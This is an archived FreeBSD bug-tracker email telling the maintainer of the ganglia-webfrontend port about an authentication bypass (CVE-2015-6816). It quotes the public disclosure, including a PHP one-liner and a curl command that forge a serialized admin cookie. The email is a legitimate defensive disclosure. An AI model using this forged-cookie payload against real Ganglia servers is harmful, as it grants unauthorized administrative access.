Date: Mon, 07 Sep 2015 02:36:16 +0000 From: bugzilla-noreply@freebsd.org To: freebsd-ports-bugs@FreeBSD.org Subject: [Bug 202940] sysutils/ganglia-webfrontend: Ganglia-web auth bypass (CVE-2015-6816) Message-ID: <bug-202940-13@https.bugs.freebsd.org/bugzilla/>
next in thread | raw e-mail | index | archive | help
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=202940 Bug ID: 202940 Summary: sysutils/ganglia-webfrontend: Ganglia-web auth bypass (CVE-2015-6816) Product: Ports & Packages Version: Latest Hardware: Any OS: Any Status: New Severity: Affects Some People Priority: --- Component: Individual Port(s) Assignee: freebsd-ports-bugs@FreeBSD.org Reporter: junovitch@freebsd.org CC: jrm@ftfl.ca CC: jrm@ftfl.ca Flags: maintainer-feedback?(jrm@ftfl.ca) Maintainer of sysutils/ganglia-webfrontend, A security issue has been reported against this port. References: http://seclists.org/oss-sec/2015/q3/494 "It's easy to bypass auth by using boolean serialization like this: $ php -r "echo urlencode(serialize(array('user'=>'admin', 'group'=>'admin', 'token'=>true))); // Found by d90.andrew // Exploit: curl -H 'Cookie: a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22group%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22token%22%3Bb%3A1%3B%7D'" http://seclists.org/oss-sec/2015/q3/502 "Use CVE-2015-6816." https://github.com/ganglia/ganglia-web/issues/267 -- You are receiving this mail because: You are the assignee for the bug.
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?bug-202940-13>